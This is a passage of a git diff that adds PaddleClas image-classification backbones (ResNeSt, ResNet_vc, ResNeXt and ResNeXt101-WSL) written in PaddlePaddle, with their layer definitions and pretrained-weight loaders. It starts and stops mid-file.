kernel_size=1, stride=1, padding=0, ceil_mode=True) + + self.conv4 = Conv2D( + in_channels=self.inplanes, + out_channels=planes * 4, + kernel_size=1, + stride=1, + padding=0, + groups=1, + weight_attr=ParamAttr( + name=name + "_weights", initializer=KaimingNormal()), + bias_attr=False) + else: + self.conv4 = Conv2D( + in_channels=self.inplanes, + out_channels=planes * 4, + kernel_size=1, + stride=stride, + padding=0, + groups=1, + weight_attr=ParamAttr( + name=name + "_shortcut_weights", + initializer=KaimingNormal()), + bias_attr=False) + + bn_decay = 0.0 + self._batch_norm = BatchNorm( + planes * 4, + act=None, + param_attr=ParamAttr( + name=name + "_shortcut_scale", + regularizer=L2Decay(bn_decay)), + bias_attr=ParamAttr( + name + "_shortcut_offset", regularizer=L2Decay(bn_decay)), + moving_mean_name=name + "_shortcut_mean", + moving_variance_name=name + "_shortcut_variance") + + def forward(self, x): + short = x + + x = self.conv1(x) + if self.avd and self.avd_first and (self.stride > 1 or self.is_first): + x = self.avg_pool2d_1(x) + + x = self.conv2(x) + + if self.avd and self.avd_first == False and (self.stride > 1 or + self.is_first): + x = self.avg_pool2d_2(x) + + x = self.conv3(x) + + if self.stride != 1 or self.inplanes != self.planes * 4: + if self.avg_down: + short = self.avg_pool2d_3(short) + + short = self.conv4(short) + + short = self._batch_norm(short) + + y = paddle.add(x=short, y=x) + y = F.relu(y) + return y + + +class ResNeStLayer(nn.Layer): + def __init__(self, + inplanes, + planes, + blocks, + radix, + cardinality, + bottleneck_width, + avg_down, + avd, + avd_first, + rectify_avg, + last_gamma, + stride=1, + dilation=1, + is_first=True, + name=None): + super(ResNeStLayer, self).__init__() + self.inplanes = inplanes + self.planes = planes + self.blocks = blocks + self.radix = radix + self.cardinality = cardinality + self.bottleneck_width = bottleneck_width + self.avg_down = avg_down + self.avd = avd + self.avd_first = avd_first + self.rectify_avg = rectify_avg + self.last_gamma = last_gamma + self.is_first = is_first + + if dilation == 1 or dilation == 2: + bottleneck_func = self.add_sublayer( + name + "_bottleneck_0", + BottleneckBlock( + inplanes=self.inplanes, + planes=planes, + stride=stride, + radix=radix, + cardinality=cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + dilation=1, + is_first=is_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + name=name + "_bottleneck_0")) + elif dilation == 4: + bottleneck_func = self.add_sublayer( + name + "_bottleneck_0", + BottleneckBlock( + inplanes=self.inplanes, + planes=planes, + stride=stride, + radix=radix, + cardinality=cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + dilation=2, + is_first=is_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + name=name + "_bottleneck_0")) + else: + raise RuntimeError("=>unknown dilation size") + + self.inplanes = planes * 4 + self.bottleneck_block_list = [bottleneck_func] + for i in range(1, blocks): + curr_name = name + "_bottleneck_" + str(i) + + bottleneck_func = self.add_sublayer( + curr_name, + BottleneckBlock( + inplanes=self.inplanes, + planes=planes, + radix=radix, + cardinality=cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + dilation=dilation, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + name=curr_name)) + self.bottleneck_block_list.append(bottleneck_func) + + def forward(self, x): + for bottleneck_block in self.bottleneck_block_list: + x = bottleneck_block(x) + return x + + +class ResNeSt(nn.Layer): + def __init__(self, + layers, + radix=1, + groups=1, + bottleneck_width=64, + dilated=False, + dilation=1, + deep_stem=False, + stem_width=64, + avg_down=False, + rectify_avg=False, + avd=False, + avd_first=False, + final_drop=0.0, + last_gamma=False, + class_num=1000): + super(ResNeSt, self).__init__() + + self.cardinality = groups + self.bottleneck_width = bottleneck_width + # ResNet-D params + self.inplanes = stem_width * 2 if deep_stem else 64 + self.avg_down = avg_down + self.last_gamma = last_gamma + # ResNeSt params + self.radix = radix + self.avd = avd + self.avd_first = avd_first + + self.deep_stem = deep_stem + self.stem_width = stem_width + self.layers = layers + self.final_drop = final_drop + self.dilated = dilated + self.dilation = dilation + + self.rectify_avg = rectify_avg + + if self.deep_stem: + self.stem = nn.Sequential( + ("conv1", ConvBNLayer( + num_channels=3, + num_filters=stem_width, + filter_size=3, + stride=2, + act="relu", + name="conv1")), ("conv2", ConvBNLayer( + num_channels=stem_width, + num_filters=stem_width, + filter_size=3, + stride=1, + act="relu", + name="conv2")), ("conv3", ConvBNLayer( + num_channels=stem_width, + num_filters=stem_width * 2, + filter_size=3, + stride=1, + act="relu", + name="conv3"))) + else: + self.stem = ConvBNLayer( + num_channels=3, + num_filters=stem_width, + filter_size=7, + stride=2, + act="relu", + name="conv1") + + self.max_pool2d = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.layer1 = ResNeStLayer( + inplanes=self.stem_width * 2 + if self.deep_stem else self.stem_width, + planes=64, + blocks=self.layers[0], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=1, + dilation=1, + is_first=False, + name="layer1") + + # return + + self.layer2 = ResNeStLayer( + inplanes=256, + planes=128, + blocks=self.layers[1], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=2, + name="layer2") + + if self.dilated or self.dilation == 4: + self.layer3 = ResNeStLayer( + inplanes=512, + planes=256, + blocks=self.layers[2], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=1, + dilation=2, + name="layer3") + self.layer4 = ResNeStLayer( + inplanes=1024, + planes=512, + blocks=self.layers[3], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=1, + dilation=4, + name="layer4") + elif self.dilation == 2: + self.layer3 = ResNeStLayer( + inplanes=512, + planes=256, + blocks=self.layers[2], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=2, + dilation=1, + name="layer3") + self.layer4 = ResNeStLayer( + inplanes=1024, + planes=512, + blocks=self.layers[3], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=1, + dilation=2, + name="layer4") + else: + self.layer3 = ResNeStLayer( + inplanes=512, + planes=256, + blocks=self.layers[2], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=2, + name="layer3") + self.layer4 = ResNeStLayer( + inplanes=1024, + planes=512, + blocks=self.layers[3], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=2, + name="layer4") + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.out_channels = 2048 + + stdv = 1.0 / math.sqrt(self.out_channels * 1.0) + + self.out = Linear( + self.out_channels, + class_num, + weight_attr=ParamAttr( + initializer=nn.initializer.Uniform(-stdv, stdv), + name="fc_weights"), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, x): + x = self.stem(x) + x = self.max_pool2d(x) + x = self.layer1(x) + x = self.layer2(x) + + x = self.layer3(x) + + x = self.layer4(x) + x = self.pool2d_avg(x) + x = paddle.reshape(x, shape=[-1, self.out_channels]) + x = self.out(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ResNeSt50_fast_1s1x64d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeSt( + layers=[3, 4, 6, 3], + radix=1, + groups=1, + bottleneck_width=64, + deep_stem=True, + stem_width=32, + avg_down=True, + avd=True, + avd_first=True, + final_drop=0.0, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeSt50_fast_1s1x64d"], + use_ssld=use_ssld) + return model + + +def ResNeSt50(pretrained=False, use_ssld=False, **kwargs): + model = ResNeSt( + layers=[3, 4, 6, 3], + radix=2, + groups=1, + bottleneck_width=64, + deep_stem=True, + stem_width=32, + avg_down=True, + avd=True, + avd_first=False, + final_drop=0.0, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeSt50"], use_ssld=use_ssld) + return model + + +def ResNeSt101(pretrained=False, use_ssld=False, **kwargs): + model = ResNeSt( + layers=[3, 4, 23, 3], + radix=2, + groups=1, + bottleneck_width=64, + deep_stem=True, + stem_width=64, + avg_down=True, + avd=True, + avd_first=False, + final_drop=0.0, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeSt101"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnet_vc.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnet_vc.py new file mode 100644 index 0000000..6b972dc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnet_vc.py @@ -0,0 +1,309 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ResNet50_vc": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNet50_vc_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + if name == "conv1": + bn_name = "bn_" + name + else: + bn_name = "bn" + name[3:] + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + '_scale'), + bias_attr=ParamAttr(bn_name + '_offset'), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance') + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + shortcut=True, + name=None): + super(BottleneckBlock, self).__init__() + + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act='relu', + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + stride=stride, + act='relu', + name=name + "_branch2b") + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 4, + filter_size=1, + act=None, + name=name + "_branch2c") + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 4, + filter_size=1, + stride=stride, + name=name + "_branch1") + + self.shortcut = shortcut + + self._num_channels_out = num_filters * 4 + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + conv2 = self.conv2(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + + y = paddle.add(x=short, y=conv2) + y = F.relu(y) + return y + + +class BasicBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + shortcut=True, + name=None): + super(BasicBlock, self).__init__() + self.stride = stride + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=3, + stride=stride, + act='relu', + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + act=None, + name=name + "_branch2b") + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + stride=stride, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + y = paddle.add(x=short, y=conv1) + y = F.relu(y) + return y + + +class ResNet_vc(nn.Layer): + def __init__(self, layers=50, class_num=1000): + super(ResNet_vc, self).__init__() + + self.layers = layers + supported_layers = [18, 34, 50, 101, 152] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + + if layers == 18: + depth = [2, 2, 2, 2] + elif layers == 34 or layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + num_channels = [64, 256, 512, + 1024] if layers >= 50 else [64, 64, 128, 256] + num_filters = [64, 128, 256, 512] + + self.conv1_1 = ConvBNLayer( + num_channels=3, + num_filters=32, + filter_size=3, + stride=2, + act='relu', + name="conv1_1") + self.conv1_2 = ConvBNLayer( + num_channels=32, + num_filters=32, + filter_size=3, + stride=1, + act='relu', + name="conv1_2") + self.conv1_3 = ConvBNLayer( + num_channels=32, + num_filters=64, + filter_size=3, + stride=1, + act='relu', + name="conv1_3") + + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_list = [] + if layers >= 50: + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + if layers in [101, 152] and block == 2: + if i == 0: + conv_name = "res" + str(block + 2) + "a" + else: + conv_name = "res" + str(block + 2) + "b" + str(i) + else: + conv_name = "res" + str(block + 2) + chr(97 + i) + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels=num_channels[block] + if i == 0 else num_filters[block] * 4, + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + shortcut=shortcut, + name=conv_name)) + self.block_list.append(bottleneck_block) + shortcut = True + else: + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + conv_name = "res" + str(block + 2) + chr(97 + i) + basic_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BasicBlock( + num_channels=num_channels[block] + if i == 0 else num_filters[block], + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + shortcut=shortcut, + name=conv_name)) + self.block_list.append(basic_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_0.w_0"), + bias_attr=ParamAttr(name="fc_0.b_0")) + + def forward(self, inputs): + y = self.conv1_1(inputs) + y = self.conv1_2(y) + y = self.conv1_3(y) + y = self.pool2d_max(y) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ResNet50_vc(pretrained=False, use_ssld=False, **kwargs): + model = ResNet_vc(layers=50, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNet50_vc"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext.py new file mode 100644 index 0000000..1aef811 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext.py @@ -0,0 +1,298 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ResNeXt50_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt50_32x4d_pretrained.pdparams", + "ResNeXt50_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt50_64x4d_pretrained.pdparams", + "ResNeXt101_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_32x4d_pretrained.pdparams", + "ResNeXt101_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_64x4d_pretrained.pdparams", + "ResNeXt152_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt152_32x4d_pretrained.pdparams", + "ResNeXt152_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt152_64x4d_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act=None, + name=None, + data_format="NCHW"): + super(ConvBNLayer, self).__init__() + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False, + data_format=data_format) + if name == "conv1": + bn_name = "bn_" + name + else: + bn_name = "bn" + name[3:] + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + '_scale'), + bias_attr=ParamAttr(bn_name + '_offset'), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance', + data_layout=data_format) + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + cardinality, + shortcut=True, + name=None, + data_format="NCHW"): + super(BottleneckBlock, self).__init__() + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act='relu', + name=name + "_branch2a", + data_format=data_format) + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + groups=cardinality, + stride=stride, + act='relu', + name=name + "_branch2b", + data_format=data_format) + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 2 if cardinality == 32 else num_filters, + filter_size=1, + act=None, + name=name + "_branch2c", + data_format=data_format) + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 2 + if cardinality == 32 else num_filters, + filter_size=1, + stride=stride, + name=name + "_branch1", + data_format=data_format) + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + conv2 = self.conv2(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + + y = paddle.add(x=short, y=conv2) + y = F.relu(y) + return y + + +class ResNeXt(nn.Layer): + def __init__(self, + layers=50, + class_num=1000, + cardinality=32, + input_image_channel=3, + data_format="NCHW"): + super(ResNeXt, self).__init__() + + self.layers = layers + self.data_format = data_format + self.input_image_channel = input_image_channel + self.cardinality = cardinality + supported_layers = [50, 101, 152] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + supported_cardinality = [32, 64] + assert cardinality in supported_cardinality, \ + "supported cardinality is {} but input cardinality is {}" \ + .format(supported_cardinality, cardinality) + if layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + num_channels = [64, 256, 512, 1024] + num_filters = [128, 256, 512, + 1024] if cardinality == 32 else [256, 512, 1024, 2048] + + self.conv = ConvBNLayer( + num_channels=self.input_image_channel, + num_filters=64, + filter_size=7, + stride=2, + act='relu', + name="res_conv1", + data_format=self.data_format) + self.pool2d_max = MaxPool2D( + kernel_size=3, stride=2, padding=1, data_format=self.data_format) + + self.block_list = [] + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + if layers in [101, 152] and block == 2: + if i == 0: + conv_name = "res" + str(block + 2) + "a" + else: + conv_name = "res" + str(block + 2) + "b" + str(i) + else: + conv_name = "res" + str(block + 2) + chr(97 + i) + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels=num_channels[block] if i == 0 else + num_filters[block] * int(64 // self.cardinality), + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + cardinality=self.cardinality, + shortcut=shortcut, + name=conv_name, + data_format=self.data_format)) + self.block_list.append(bottleneck_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1, data_format=self.data_format) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_weights"), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, inputs): + with paddle.static.amp.fp16_guard(): + if self.data_format == "NHWC": + inputs = paddle.tensor.transpose(inputs, [0, 2, 3, 1]) + inputs.stop_gradient = True + y = self.conv(inputs) + y = self.pool2d_max(y) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ResNeXt50_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=50, cardinality=32, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeXt50_32x4d"], use_ssld=use_ssld) + return model + + +def ResNeXt50_64x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=50, cardinality=64, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeXt50_64x4d"], use_ssld=use_ssld) + return model + + +def ResNeXt101_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=101, cardinality=32, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeXt101_32x4d"], use_ssld=use_ssld) + return model + + +def ResNeXt101_64x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=101, cardinality=64, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeXt101_64x4d"], use_ssld=use_ssld) + return model + + +def ResNeXt152_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=152, cardinality=32, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeXt152_32x4d"], use_ssld=use_ssld) + return model + + +def ResNeXt152_64x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=152, cardinality=64, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeXt152_64x4d"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext101_wsl.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext101_wsl.py new file mode 100644 index 0000000..e85e133 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext101_wsl.py @@ -0,0 +1,490 @@ +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ResNeXt101_32x8d_wsl": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_32x8d_wsl_pretrained.pdparams", + "ResNeXt101_32x16d_wsl": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_32x16_wsl_pretrained.pdparams", + "ResNeXt101_32x32d_wsl": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_32x32d_wsl_pretrained.pdparams", + "ResNeXt101_32x48d_wsl": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_32x48d_wsl_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + input_channels, + output_channels, + filter_size, + stride=1, + groups=1, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + if "downsample" in name: + conv_name = name + ".0" + else: + conv_name = name + self._conv = Conv2D( + in_channels=input_channels, + out_channels=output_channels, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=conv_name + ".weight"), + bias_attr=False) + if "downsample" in name: + bn_name = name[:9] + "downsample.1" + else: + if "conv1" == name: + bn_name = "bn" + name[-1] + else: + bn_name = (name[:10] if name[7:9].isdigit() else name[:9] + ) + "bn" + name[-1] + self._bn = BatchNorm( + num_channels=output_channels, + act=act, + param_attr=ParamAttr(name=bn_name + ".weight"), + bias_attr=ParamAttr(name=bn_name + ".bias"), + moving_mean_name=bn_name + ".running_mean", + moving_variance_name=bn_name + ".running_var") + + def forward(self, inputs): + x = self._conv(inputs) + x = self._bn(x) + return x + + +class ShortCut(nn.Layer): + def __init__(self, input_channels, output_channels, stride, name=None): + super(ShortCut, self).__init__() + + self.input_channels = input_channels + self.output_channels = output_channels + self.stride = stride + if input_channels != output_channels or stride != 1: + self._conv = ConvBNLayer( + input_channels, + output_channels, + filter_size=1, + stride=stride, + name=name) + + def forward(self, inputs): + if self.input_channels != self.output_channels or self.stride != 1: + return self._conv(inputs) + return inputs + + +class BottleneckBlock(nn.Layer): + def __init__(self, input_channels, output_channels, stride, cardinality, + width, name): + super(BottleneckBlock, self).__init__() + + self._conv0 = ConvBNLayer( + input_channels, + output_channels, + filter_size=1, + act="relu", + name=name + ".conv1") + self._conv1 = ConvBNLayer( + output_channels, + output_channels, + filter_size=3, + act="relu", + stride=stride, + groups=cardinality, + name=name + ".conv2") + self._conv2 = ConvBNLayer( + output_channels, + output_channels // (width // 8), + filter_size=1, + act=None, + name=name + ".conv3") + self._short = ShortCut( + input_channels, + output_channels // (width // 8), + stride=stride, + name=name + ".downsample") + + def forward(self, inputs): + x = self._conv0(inputs) + x = self._conv1(x) + x = self._conv2(x) + y = self._short(inputs) + y = paddle.add(x, y) + y = F.relu(y) + return y + + +class ResNeXt101WSL(nn.Layer): + def __init__(self, layers=101, cardinality=32, width=48, class_num=1000): + super(ResNeXt101WSL, self).__init__() + + self.class_num = class_num + + self.layers = layers + self.cardinality = cardinality + self.width = width + self.scale = width // 8 + + self.depth = [3, 4, 23, 3] + self.base_width = cardinality * width + num_filters = [self.base_width * i + for i in [1, 2, 4, 8]] # [256, 512, 1024, 2048] + self._conv_stem = ConvBNLayer( + 3, 64, 7, stride=2, act="relu", name="conv1") + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self._conv1_0 = BottleneckBlock( + 64, + num_filters[0], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer1.0") + self._conv1_1 = BottleneckBlock( + num_filters[0] // (width // 8), + num_filters[0], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer1.1") + self._conv1_2 = BottleneckBlock( + num_filters[0] // (width // 8), + num_filters[0], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer1.2") + + self._conv2_0 = BottleneckBlock( + num_filters[0] // (width // 8), + num_filters[1], + stride=2, + cardinality=self.cardinality, + 